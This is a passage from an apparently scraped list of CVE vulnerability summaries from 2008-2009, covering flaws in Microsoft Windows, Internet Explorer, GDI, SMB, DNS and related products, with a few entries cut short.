bypass authentication, and possibly read or create files, via a crafted HTTP request, aka "IIS 5.0 WebDAV Authentication Bypass Vulnerability," a different vulnerability than CVE-2009-1535. [CVE-2009-1043] Unspecified vulnerability in Microsoft Internet Explorer 8 on Windows 7 allows remote attackers to execute arbitrary code via unknown vectors triggered by clicking on a link, as demonstrated by Nils during a PWN2OWN competition at CanSecWest 2009. [CVE-2009-0555] Microsoft Windows Media Runtime, as used in DirectShow WMA Voice Codec, Windows Media Audio Voice Decoder, and Audio Compression Manager (ACM), does not properly process Advanced Systems Format (ASF) files, which allows remote attackers to execute arbitrary code via a crafted audio file that uses the Windows Media Speech codec, aka "Windows Media Runtime Voice Sample Rate Vulnerability." [CVE-2009-0554] Microsoft Internet Explorer 5.01 SP4, 6 SP1, 6 and 7 on Windows XP SP2 and SP3, 6 and 7 on Windows Server 2003 SP1 and SP2, 7 on Windows Vista Gold and SP1, and 7 on Windows Server 2008 allows remote attackers to execute arbitrary code via a web page that triggers presence of an object in memory that was (1) not properly initialized or (2) deleted, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-0553] Microsoft Internet Explorer 6 SP1, 6 and 7 on Windows XP SP2 and SP3, 6 and 7 on Windows Server 2003 SP1 and SP2, 7 on Windows Vista Gold and SP1, and 7 on Windows Server 2008 allows remote attackers to execute arbitrary code via a web page that triggers presence of an object in memory that was (1) not properly initialized or (2) deleted, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-0552] Unspecified vulnerability in Microsoft Internet Explorer 5.01 SP4, 6 SP1, 6 on Windows XP SP2 and SP3, and 6 on Windows Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a web page that triggers presence of an object in memory that was (1) not properly initialized or (2) deleted, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-0551] Microsoft Internet Explorer 6 SP1, 6 and 7 on Windows XP SP2 and SP3, 6 and 7 on Windows Server 2003 SP1 and SP2, 7 on Windows Vista Gold and SP1, and 7 on Windows Server 2008 does not properly handle transition errors in a request for one HTTP document followed by a request for a second HTTP document, which allows remote attackers to execute arbitrary code via vectors involving (1) multiple crafted pages on a web site or (2) a web page with crafted inline content such as banner advertisements, aka "Page Transition Memory Corruption Vulnerability." [CVE-2009-0550] Windows HTTP Services (aka WinHTTP) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 [CVE-2009-0341] The shell32 module in Microsoft Internet Explorer 7.0 on Windows XP SP3 might allow remote attackers to execute arbitrary code via a long VALUE attribute in an INPUT element, possibly related to a stack consumption vulnerability. [CVE-2009-0320] Microsoft Windows XP, Server 2003 and 2008, and Vista exposes I/O activity measurements of all processes, which allows local users to obtain sensitive information, as demonstrated by reading the I/O Other Bytes column in Task Manager (aka taskmgr.exe) to estimate the number of characters that a different user entered at a runas.exe password prompt, related to a "benchmarking attack." [CVE-2009-0244] Directory traversal vulnerability in the OBEX FTP Service in the Microsoft Bluetooth stack in Windows Mobile 6 Professional, and probably Windows Mobile 5.0 for Pocket PC and 5.0 for Pocket PC Phone Edition, allows remote authenticated users to list arbitrary directories, and create or read arbitrary files, via a .. (dot dot) in a pathname. NOTE: this can be leveraged for code execution by writing to a Startup folder. [CVE-2009-0243] Microsoft Windows does not properly enforce the Autorun and NoDriveTypeAutoRun registry values, which allows physically proximate attackers to execute arbitrary code by (1) inserting CD-ROM media, (2) inserting DVD media, (3) connecting a USB device, and (4) connecting a Firewire device [CVE-2009-0239] Cross-site scripting (XSS) vulnerability in Windows Search 4.0 for Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows user-assisted remote attackers to inject arbitrary web script or HTML via a crafted file that appears in a preview in a search result, aka "Script Execution in Windows Search Vulnerability." [CVE-2009-0235] Stack-based buffer overflow in the Word 97 text converter in WordPad in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted Word 97 file that triggers memory corruption, related to use of inconsistent integer data sizes for an unspecified length field, aka "WordPad Word 97 Text Converter Stack Overflow Vulnerability." [CVE-2009-0234] The DNS Resolver Cache Service (aka DNSCache) in Windows DNS Server in Microsoft Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008 does not properly cache crafted DNS responses, which makes it easier for remote attackers to predict transaction IDs and poison caches by sending many crafted DNS queries that trigger "unnecessary lookups," aka "DNS Server Response Validation Vulnerability." [CVE-2009-0233] The DNS Resolver Cache Service (aka DNSCache) in Windows DNS Server in Microsoft Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008, when dynamic updates are enabled, does not reuse cached DNS responses in all applicable situations, which makes it easier for remote attackers to predict transaction IDs and poison caches by simultaneously sending crafted DNS queries and responses, aka "DNS Server Query Validation Vulnerability." [CVE-2009-0232] Integer overflow in the Embedded OpenType (EOT) Font Engine in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted name table, aka "Embedded OpenType Font Integer Overflow Vulnerability." [CVE-2009-0231] The Embedded OpenType (EOT) Font Engine (T2EMBED.DLL) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted name table in a data record that triggers an integer truncation and a heap-based buffer overflow, aka "Embedded OpenType Font Heap Overflow Vulnerability." [CVE-2009-0229] The Windows Printing Service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 allows local users to read arbitrary files via a crafted separator page, aka "Print Spooler Read File Vulnerability." [CVE-2009-0202] Array index error in FL21WIN.DLL in the PowerPoint Freelance Windows 2.1 Translator in Microsoft PowerPoint 2000 and 2002 allows remote attackers to execute arbitrary code via a Freelance file with unspecified "layout information" that triggers a heap-based buffer overflow. [CVE-2009-0119] Buffer overflow in Microsoft Windows XP SP3 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via a crafted .chm file. [CVE-2009-0094] The WINS server in Microsoft Windows 2000 SP4 and Server 2003 SP1 and SP2 does not restrict registration of the (1) "wpad" and (2) "isatap" NetBIOS names, which allows remote authenticated users to hijack the Web Proxy Auto-Discovery (WPAD) and Intra-Site Automatic Tunnel Addressing Protocol (ISATAP) features, and conduct man-in-the-middle attacks by spoofing a proxy server or ISATAP route, by registering one of these names in the WINS database, aka "WPAD WINS Server Registration Vulnerability," a related issue to CVE-2007-1692. [CVE-2009-0093] Windows DNS Server in Microsoft Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008, when dynamic updates are enabled, does not restrict registration of the "wpad" hostname, which allows remote authenticated users to hijack the Web Proxy Auto-Discovery (WPAD) feature, and conduct man-in-the-middle attacks by spoofing a proxy server, via a Dynamic Update request for this hostname, aka "DNS Server Vulnerability in WPAD Registration Vulnerability," a related issue to CVE-2007-1692. [CVE-2009-0089] Windows HTTP Services (aka WinHTTP) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, and Vista Gold allows remote web servers to impersonate arbitrary https web sites by using DNS spoofing to "forward a connection" to a different https web site that has a valid certificate matching its own domain name, but not a certificate matching the domain name of the host requested by the user, aka "Windows HTTP Services Certificate Name Mismatch Vulnerability." [CVE-2009-0087] Unspecified vulnerability in the Word 6 text converter in WordPad in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 [CVE-2009-0086] Integer underflow in Windows HTTP Services (aka WinHTTP) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote HTTP servers to execute arbitrary code via crafted parameter values in a response, related to error handling, aka "Windows HTTP Services Integer Underflow Vulnerability." [CVE-2009-0085] The Secure Channel (aka SChannel) authentication component in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008, when certificate authentication is used, does not properly validate the client's key exchange data in Transport Layer Security (TLS) handshake messages, which allows remote attackers to spoof authentication by crafting a TLS packet based on knowledge of the certificate but not the private key, aka "SChannel Spoofing Vulnerability." [CVE-2009-0083] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 does not properly handle invalid pointers, which allows local users to gain privileges via an application that triggers use of a crafted pointer, aka "Windows Kernel Invalid Pointer Vulnerability." [CVE-2009-0082] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate handles, which allows local users to gain privileges via a crafted application that triggers unspecified "actions," aka "Windows Kernel Handle Validation Vulnerability." [CVE-2009-0081] The graphics device interface (GDI) implementation in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate input received from user mode, which allows remote attackers to execute arbitrary code via a crafted (1) Windows Metafile (aka WMF) or (2) Enhanced Metafile (aka EMF) image file, aka "Windows Kernel Input Validation Vulnerability." [CVE-2009-0078] The Windows Management Instrumentation (WMI) provider in Microsoft Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly implement isolation among a set of distinct processes that (1) all run under the NetworkService account or (2) all run under the LocalService account, which allows local users to gain privileges by accessing the resources of one of the processes, aka "Windows WMI Service Isolation Vulnerability." [CVE-2008-6819] win32k.sys in Microsoft Windows Server 2003 and Vista allows local users to cause a denial of service (system crash) via vectors related to CreateWindow, TranslateMessage, and DispatchMessage, possibly a race condition between threads, a different vulnerability than CVE-2008-1084. NOTE: some of these details are obtained from third party information. [CVE-2008-6219] nsrexecd.exe in multiple EMC Networker products including EMC NetWorker Server, Storage Node, and Client 7.3.x and 7.4, 7.4.1, 7.4.2, Client and Storage Node for Open VMS 7.3.2 ECO6 and earlier, Module for Microsoft Exchange 5.1 and earlier, Module for Microsoft Applications 2.0 and earlier, Module for Meditech 2.0 and earlier, and PowerSnap 2.4 SP1 and earlier does not properly control the allocation of memory, which allows remote attackers to cause a denial of service (memory exhaustion) via multiple crafted RPC requests. [CVE-2008-6194] Memory leak in the DNS server in Microsoft Windows allows remote attackers to cause a denial of service (memory consumption) via DNS packets. NOTE: this issue reportedly exists because of an incorrect fix for CVE-2007-3898. [CVE-2008-5828] Microsoft Windows Live Messenger Client 8.5.1 and earlier, when MSN Protocol Version 15 (MSNP15) is used over a NAT session, allows remote attackers to discover intranet IP addresses and port numbers by reading the (1) IPv4InternalAddrsAndPorts, (2) IPv4Internal-Addrs, and (3) IPv4Internal-Port header fields. [CVE-2008-5823] An ActiveX control in prtstb06.dll in Microsoft Money 2006, when used with WScript in Windows Script Host (WSH) on Windows Vista, allows remote attackers to cause a denial of service (access violation and application crash) via a zero value for the Startup property. [CVE-2008-5750] Argument injection vulnerability in Microsoft Internet Explorer 8 beta 2 on Windows XP SP3 allows remote attackers to execute arbitrary commands via the --renderer-path option in a chromehtml: URI. [CVE-2008-5745] Integer overflow in quartz.dll in the DirectShow framework in Microsoft Windows Media Player (WMP) 9, 10, and 11, including 11.0.5721.5260, allows remote attackers to cause a denial of service (application crash) via a crafted (1) WAV, (2) SND, or (3) MID file. NOTE: this has been incorrectly reported as a code-execution vulnerability. NOTE: it is not clear whether this issue is related to CVE-2008-4927. [CVE-2008-5415] The LDBserver service in the server in CA ARCserve Backup 11.1 through 12.0 on Windows allows remote attackers to execute arbitrary code via a handle_t argument to an RPC endpoint in which the argument refers to an incompatible procedure. [CVE-2008-5232] Buffer overflow in the CallHTMLHelp method in the Microsoft Windows Media Services ActiveX control in nskey.dll 4.1.00.3917 in Windows Media Services on Microsoft Windows NT and 2000, and Avaya Media and Message Application servers, allows remote attackers to execute arbitrary code via a long argument. NOTE: the provenance of this information is unknown [CVE-2008-5229] Stack-based buffer overflow in Microsoft Device IO Control in iphlpapi.dll in Microsoft Windows Vista Gold and SP1 allows local users in the Network Configuration Operator group to gain privileges or cause a denial of service (system crash) via a large invalid PrefixLength to the CreateIpForwardEntry2 method, as demonstrated by a "route add" command. NOTE: this issue might not cross privilege boundaries. [CVE-2008-5179] Unspecified vulnerability in Microsoft Office Communications Server (OCS), Office Communicator, and Windows Live Messenger allows remote attackers to cause a denial of service (crash) via a crafted Real-time Transport Control Protocol (RTCP) receiver report packet. [CVE-2008-5112] The LDAP server in Active Directory in Microsoft Windows 2000 SP4 and Server 2003 SP1 and SP2 responds differently to a failed bind attempt depending on whether the user account exists and is permitted to login, which allows remote attackers to enumerate valid usernames via a series of LDAP bind requests, as demonstrated by ldapuserenum. [CVE-2008-5044] Race condition in Microsoft Windows Server 2003 and Vista allows local users to cause a denial of service (crash or hang) via a multi-threaded application that makes many calls to UnhookWindowsHookEx while certain other desktop activity is occurring. [CVE-2008-4927] Microsoft Windows Media Player (WMP) 9.0 through 11 allows user-assisted attackers to cause a denial of service (application crash) via a malformed (1) MIDI or (2) DAT file, related to "MThd Header Parsing." NOTE: the provenance of this information is unknown [CVE-2008-4841] The WordPad Text Converter for Word 97 files in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted (1) .doc, (2) .wri, or (3) .rtf Word 97 file that triggers memory corruption, as exploited in the wild in December 2008. NOTE: As of 20081210, it is unclear whether this vulnerability is related to a WordPad issue disclosed on 20080925 with a 2008-crash.doc.rar example, but there are insufficient details to be sure. [CVE-2008-4835] SMB in the Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to execute arbitrary code via malformed values of unspecified "fields inside the SMB packets" in an NT Trans2 request, related to "insufficiently validating the buffer size," aka "SMB Validation Remote Code Execution Vulnerability." [CVE-2008-4834] Buffer overflow in SMB in the Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via malformed values of unspecified "fields inside the SMB packets" in an NT Trans request, aka "SMB Buffer Overflow Remote Code Execution Vulnerability." [CVE-2008-4609] The TCP implementation in (1) Linux, (2) platforms based on BSD Unix, (3) Microsoft Windows, (4) Cisco products, and probably other operating systems allows remote attackers to cause a denial of service (connection queue exhaustion) via multiple vectors that manipulate information in the TCP state table, as demonstrated by sockstress. [CVE-2008-4510] Microsoft Windows Vista Home and Ultimate Edition SP1 and earlier allows local users to cause a denial of service (page fault and system crash) via multiple attempts to access a virtual address in a PAGE_NOACCESS memory page. [CVE-2008-4327] gdiplus.dll in GDI+ in Microsoft Windows XP SP3 does not properly handle crafted .ico files, which allows remote attackers to cause a denial of service (divide-by-zero error and application crash) via a certain crash.ico file on a web site, and allows user-assisted attackers to cause a denial of service (divide-by-zero error and persistent application crash) via this crash.ico file on the desktop, a different vulnerability than CVE-2007-2237. [CVE-2008-4323] Windows Explorer in Microsoft Windows XP SP3 allows user-assisted attackers to cause a denial of service (application crash) via a crafted .ZIP file. [CVE-2008-4295] Microsoft Windows Mobile 6.0 on HTC Wiza 200 and HTC MDA 8125 devices does not properly handle the first attempt to establish a Bluetooth connection to a peer with a long name, which allows remote attackers to cause a denial of service (device reboot) by configuring a Bluetooth device with a long hci name and (1) connecting directly to the Windows Mobile system or (2) waiting for the Windows Mobile system to scan for nearby devices. [CVE-2008-4269] The search-ms protocol handler in Windows Explorer in Microsoft Windows Vista Gold and SP1 and Server 2008 uses untrusted parameter data obtained from incorrect parsing, which allows remote attackers to execute arbitrary code via a crafted HTML document, aka "Windows Search Parsing Vulnerability." [CVE-2008-4268] The Windows Search component in Microsoft Windows Vista Gold and SP1 and Server 2008 does not properly free memory during a save operation for a Windows Search file, which allows remote attackers to execute arbitrary code via a crafted saved-search file, aka "Windows Saved Search Vulnerability." [CVE-2008-4261] Stack-based buffer overflow in Microsoft Internet Explorer 5.01 SP4, 6 SP1 on Windows 2000, and 6 on Windows XP and Server 2003 does not properly handle extraneous data associated with an object embedded in a web page, which allows remote attackers to execute arbitrary code via crafted HTML tags that trigger memory corruption, aka "HTML Rendering Memory Corruption Vulnerability." [CVE-2008-4255] Heap-based buffer overflow in mscomct2.ocx (aka Windows Common ActiveX control or Microsoft Animation ActiveX control) in Microsoft Visual Basic 6.0, Visual Studio .NET 2002 SP1 and 2003 SP1, Visual FoxPro 8.0 SP1 and 9.0 SP1 and SP2, and Office Project 2003 SP3 and 2007 Gold and SP1 allows remote attackers to execute arbitrary code via an AVI file with a crafted stream length, which triggers an "allocation error" and memory corruption, aka "Windows Common AVI Parsing Overflow Vulnerability." [CVE-2008-4127] Mshtml.dll in Microsoft Internet Explorer 7 Gold 7.0.5730 and 8 Beta 8.0.6001 on Windows XP SP2 allows remote attackers to cause a denial of service (failure of subsequent image rendering) via a crafted PNG file, related to an infinite loop in the CDwnTaskExec::ThreadExec function. [CVE-2008-4071] A certain ActiveX control in Adobe Acrobat 9, when used with Microsoft Windows Vista and Internet Explorer 7, allows remote attackers to cause a denial of service (browser crash) via an src property value with an invalid acroie:// URL. [CVE-2008-4038] Buffer underflow in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to execute arbitrary code via a Server Message Block (SMB) request that contains a filename with a crafted length, aka "SMB Buffer Underflow Vulnerability." [CVE-2008-4037] Microsoft Windows 2000 Gold through SP4, XP Gold through SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote SMB servers to execute arbitrary code on a client machine by replaying the NTLM credentials of a client user, as demonstrated by backrush, aka "SMB Credential Reflection Vulnerability." NOTE: some reliable sources report that this vulnerability exists because of an insufficient fix for CVE-2000-0834. [CVE-2008-4036] Integer overflow in Memory Manager in Microsoft Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows local users to gain privileges via a crafted application that triggers an erroneous decrement of a variable, related to validation of parameters for Virtual Address Descriptors (VADs) and a "memory allocation mapping error," aka "Virtual Address Descriptor Elevation of Privilege Vulnerability." [CVE-2008-4023] Active Directory in Microsoft Windows 2000 SP4 does not properly allocate memory for (1) LDAP and (2) LDAPS requests, which allows remote attackers to execute arbitrary code via a crafted request, aka "Active Directory Overflow Vulnerability." [CVE-2008-3957] The Microsoft Windows Image Acquisition Logger ActiveX control allows remote attackers to force the download of arbitrary files onto a client system via a URL in the first argument to the Open method, in conjunction with a full destination pathname in the first argument to the Save method. NOTE: the provenance of this information is unknown [CVE-2008-3893] Microsoft Bitlocker in Windows Vista before SP1 stores pre-boot authentication passwords in the BIOS Keyboard buffer and does not clear this buffer during boot, which allows local users to obtain sensitive information by reading the physical memory locations associated with this buffer. [CVE-2008-3815] Unspecified vulnerability in Cisco Adaptive Security Appliances (ASA) 5500 Series and PIX Security Appliances 7.0 before 7.0(8)3, 7.1 before 7.1(2)78, 7.2 before 7.2(4)16, 8.0 before 8.0(4)6, and 8.1 before 8.1(1)13, when configured as a VPN using Microsoft Windows NT Domain authentication, allows remote attackers to bypass VPN authentication via unknown vectors. [CVE-2008-3648] nslookup.exe in Microsoft Windows XP SP2 allows user-assisted remote attackers to execute arbitrary code, as demonstrated by an attempted DNS zone transfer, and as exploited in the wild in August 2008. [CVE-2008-3636] Integer overflow in the IopfCompleteRequest API in the kernel in Microsoft Windows 2000, XP, Server 2003, and Vista allows context-dependent attackers to gain privileges. NOTE: this issue was originally reported for GEARAspiWDM.sys 2.0.7.5 in Gear Software CD DVD Filter driver before 4.001.7, as used in other products including Apple iTunes and multiple Symantec and Norton products, which allows local users to gain privileges via repeated IoAttachDevice IOCTL calls to \\.\GEARAspiWDMDevice in this GEARAspiWDM.sys. However, the root cause is the integer overflow in the API call itself. [CVE-2008-3466] Microsoft Host Integration Server (HIS) 2000, 2004, and 2006 does not limit RPC access to administrative functions, which allows remote attackers to bypass authentication and execute arbitrary programs via a crafted SNA RPC message using opcode 1 or 6 to call the CreateProcess function, aka "HIS Command Execution Vulnerability." [CVE-2008-3465] Heap-based buffer overflow in an API in GDI in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows context-dependent attackers to cause a denial of service or execute arbitrary code via a WMF file with a malformed file-size parameter, which would not be properly handled by a third-party application that uses this API for a copy operation, aka "GDI Heap Overflow Vulnerability." [CVE-2008-3464] afd.sys in the Ancillary Function Driver (AFD) component in Microsoft Windows XP SP2 and SP3 and Windows Server 2003 SP1 and SP2 does not properly validate input sent from user mode to the kernel, which allows local users to gain privileges via a crafted application, as demonstrated using crafted pointers and lengths that bypass intended ProbeForRead and ProbeForWrite restrictions, aka "AFD Kernel Overwrite Vulnerability." [CVE-2008-3068] Microsoft Crypto API 5.131.2600.2180 through 6.0, as used in Outlook, Windows Live Mail, and Office 2007, performs Certificate Revocation List (CRL) checks by using an arbitrary URL from a certificate embedded in a (1) S/MIME e-mail message or (2) signed document, which allows remote attackers to obtain reading times and IP addresses of recipients, and port-scan results, via a crafted certificate with an Authority Information Access (AIA) extension. [CVE-2008-3014] Buffer overflow in gdiplus.dll in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a malformed WMF image file that triggers improper memory allocation, aka "GDI+ WMF Buffer Overrun Vulnerability." [CVE-2008-3013] gdiplus.dll in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a malformed GIF image file containing many extension markers for graphic control extensions and subsequent unknown labels, aka "GDI+ GIF Parsing Vulnerability." [CVE-2008-3012] gdiplus.dll in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 does not properly perform memory allocation, which allows remote attackers to execute arbitrary code via a malformed EMF image file, aka "GDI+ EMF Memory Corruption Vulnerability." [CVE-2008-3010] Microsoft Windows Media Player 6.4, Windows Media Format Runtime 7.1 through 11, and Windows Media Services 4.1 and 9 incorrectly associate ISATAP addresses with the Local Intranet zone, which allows remote servers to capture NTLM credentials, and execute arbitrary code through credential-reflection attacks, by sending an authentication request, aka "ISATAP Vulnerability." [CVE-2008-3009] Microsoft Windows Media Player 6.4, Windows Media Format Runtime 7.1 through 11, and Windows Media Services 4.1, 9, and 2008 do not properly use the Service Principal Name (SPN) identifier when validating replies to authentication requests, which allows remote servers to execute arbitrary code via vectors that employ NTLM credential reflection, aka "SPN Vulnerability." [CVE-2008-3008] Stack-based buffer overflow in the WMEncProfileManager ActiveX control in wmex.dll in Microsoft Windows Media Encoder 9 Series allows remote attackers to execute arbitrary code via a long first argument to the GetDetailsString method, aka "Windows Media Encoder Buffer Overrun Vulnerability." [CVE-2008-2547] Stack-based buffer overflow in msiexec.exe 3.1.4000.1823 and 4.5.6001.22159 in Microsoft Windows Installer allows context-dependent attackers to execute arbitrary code via a long GUID value for the /x (aka /uninstall) option. NOTE: this issue might cross privilege boundaries if msiexec.exe is reachable via components such as ActiveX controls, and might additionally require a separate vulnerability in the control. [CVE-2008-2540] Apple Safari on Mac OS X, and before 3.1.2 on Windows, does not prompt the user before downloading an object that has an unrecognized content type, which allows remote attackers to place malware into the (1) Desktop directory on Windows or (2) Downloads directory on Mac OS X, and subsequently allows remote attackers to execute arbitrary code on Windows by leveraging an untrusted search path vulnerability in (a) Internet Explorer 7 on Windows XP or (b) the SearchPath function in Windows XP, Vista, and Server 2003 and 2008, aka a "Carpet Bomb" and a "Blended Threat Elevation of Privilege Vulnerability," a different issue than CVE-2008-1032. NOTE: Apple considers this a vulnerability only because the Microsoft products can load application libraries from the desktop and, as of 20080619, has not covered the issue in an advisory for Mac OS X. [CVE-2008-2253] Unspecified vulnerability in Microsoft Windows Media Player 11 allows remote attackers to execute arbitrary code via a crafted audio-only file that is streamed from a Server-Side Playlist (SSPL) on Windows Media Server, aka "Windows Media Player Sampling Rate Vulnerability." [CVE-2008-2252] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate parameters sent from user mode to the kernel, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Memory Corruption Vulnerability." [CVE-2008-2251] Double free vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows local users to gain privileges via a crafted application that makes system calls within multiple threads, aka "Windows Kernel Unhandled Exception Vulnerability." NOTE: according to Microsoft, this is not a duplicate of CVE-2008-4510. [CVE-2008-2250] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate window properties sent from a parent window to a child window during creation of a new window, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Window Creation Vulnerability." [CVE-2008-2249] Integer overflow in GDI in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to execute arbitrary code via a malformed header in a crafted WMF file, which triggers a buffer overflow, aka "GDI Integer Overflow Vulnerability." [CVE-2008-2246] Microsoft Windows Vista through SP1 and Server 2008 do not properly import the default IPsec policy from a Windows Server 2003 domain to a Windows Server 2008 domain, which prevents IPsec rules from being enforced and allows remote attackers to bypass intended access restrictions. [CVE-2008-2245] Heap-based buffer overflow in the InternalOpenColorProfile function in mscms.dll in Microsoft Windows Image Color Management System (MSCMS) in the Image Color Management (ICM) component on Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted image file. [CVE-2008-2160] Multiple unspecified vulnerabilities in the JPEG (GDI+) and GIF image processing in Microsoft Windows CE 5.0 allow remote attackers to execute arbitrary code via crafted (1) JPEG and (2) GIF images. [CVE-2008-1888] Cross-site scripting (XSS) vulnerability in Microsoft Windows SharePoint Services 2.0 allows remote attackers to inject arbitrary web script or HTML via the Picture Source (aka picture object source) field in the Rich Text Editor. [CVE-2008-1457] The Event System in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate per-user subscriptions, which allows remote authenticated users to execute arbitrary code via a crafted event subscription request. [CVE-2008-1456] Array index vulnerability in the Event System in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote authenticated users to execute arbitrary code via a crafted event subscription request that is used to access an array of function pointers. [CVE-2008-1454] Unspecified vulnerability in Microsoft DNS in Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008 allows remote attackers to conduct cache poisoning attacks via unknown vectors related to accepting "records from a response that is outside the remote server's authority," aka "DNS Cache Poisoning Vulnerability," a different vulnerability than CVE-2008-1447. [CVE-2008-1453] The Bluetooth stack in Microsoft Windows XP SP2 and SP3, and Vista Gold and SP1, allows physically proximate attackers to execute arbitrary code via a large series of Service Discovery Protocol (SDP) packets. [CVE-2008-1451] The WINS service on Microsoft Windows 2000 SP4, and Server 2003 SP1 and SP2, does not properly validate data structures in WINS network packets, which allows local users to gain privileges via a crafted packet, aka "Memory Overwrite Vulnerability." [CVE-2008-1448] The MHTML protocol handler in a component of Microsoft Outlook Express 5.5 SP2 and 6 through SP1, and Windows Mail, does not assign the correct Internet Explorer Security Zone to UNC share pathnames, which allows remote attackers to bypass intended access restrictions and read arbitrary files via an mhtml: URI in conjunction with a redirection, aka "URL Parsing Cross-Domain Information Disclosure Vulnerability." [CVE-2008-1446] Integer overflow in the Internet Printing Protocol (IPP) ISAPI extension in Microsoft Internet Information Services (IIS) 5.0 through 7.0 on Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, and Server 2008 allows remote authenticated users to execute arbitrary code via an HTTP POST request that triggers an outbound IPP connection from a web server to a machine operated by the attacker, aka "Integer Overflow in IPP Service Vulnerability." [CVE-2008-1445] Active Directory on Microsoft Windows 2000 Server SP4, XP Professional SP2 and SP3, Server 2003 SP1 and SP2, and Server 2008 allows remote authenticated users to cause a denial of service (system hang or reboot) via a crafted LDAP request. [CVE-2008-1444] Stack-based buffer overflow in Microsoft DirectX 7.0 and 8.1 on Windows 2000 SP4 allows remote attackers to execute arbitrary code via a Synchronized Accessible Media Interchange (SAMI) file with crafted parameters for a Class Name variable, aka the "SAMI Format Parsing Vulnerability." [CVE-2008-1441] Microsoft Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to cause a denial of service (system hang) via a series of Pragmatic General Multicast (PGM) packets with invalid fragment options, aka the "PGM Malformed Fragment Vulnerability." 